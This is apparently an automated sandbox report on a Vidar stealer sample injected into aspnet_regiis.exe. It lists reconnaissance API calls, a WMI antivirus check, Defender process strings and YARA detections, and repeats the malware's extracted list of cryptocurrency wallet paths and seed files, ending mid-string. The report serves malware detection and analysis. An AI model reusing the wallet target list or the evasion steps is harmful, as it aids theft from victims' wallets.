Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_02A2AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_02A2B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_02A2B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetLocaleInfoA,	3_2_02A2E6A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_02A2B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_02A2B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_02A2749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_02A2B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_02A2B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_02A28DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_02A29D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_02A2E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_02A27576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: EnumSystemLocalesA,	3_2_02A2B556

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D5CD64B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6D5CD64B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A10C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

3_2_02A10C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A10D2E GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

3_2_02A10D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 